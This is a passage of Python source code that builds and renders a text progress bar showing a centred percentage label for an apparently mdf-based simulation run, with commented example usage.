num_hashes = int(round((percent_done / 100.0) * all_full))
self.prog_bar = '[' + self.fill_char * num_hashes + ' ' * (all_full - num_hashes) + ']'
pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))
pct_string = '%d%%' % percent_done
self.prog_bar = self.prog_bar[0:pct_place] + \
(pct_string + self.prog_bar[pct_place + len(pct_string):])
def __str__(self):
return str(self.prog_bar)
def combine_result(self, other, other_ctx, ctx):
self.set_date(other_ctx.get_date())
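# Example usage (hypothetical dates; in practice mdf's run loop calls the
# instance with each simulation date as it is processed):
#
#   from datetime import datetime
#   bar = ProgressBar(datetime(2015, 1, 1), datetime(2015, 12, 31))
#   bar(datetime(2015, 7, 1), ctx=None)   # renders the bar at roughly 50%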
|